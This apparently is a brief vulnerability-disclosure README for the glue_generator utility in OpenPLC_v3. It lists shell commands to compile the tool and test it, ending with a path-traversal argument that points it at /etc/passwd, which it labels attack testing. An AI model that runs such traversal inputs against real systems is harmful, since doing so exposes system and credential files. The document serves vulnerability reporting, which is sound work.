README.md
Rendering markdown...
#Source code URL: https://github.com/thiagoralves/OpenPLC_v3/blob/master/utils/glue_generator_src/glue_generator.cpp
#Some shell commands used for testing are as follows:
#Compile source code
g++ glue_generator.cpp -o glue_generator
#Create a test input file and write the content '(qwert, 123,)'
touch test.h
#Create test output file
touch whatever.cpp
#Perform attack testing
./glue_generator test.h whatever.cpp
#Add content '(passwd, 123,)' to/etc/passwd and perform attack testing
./glue_generator ../../../../../../../../../../etc/passwd whatever.cpp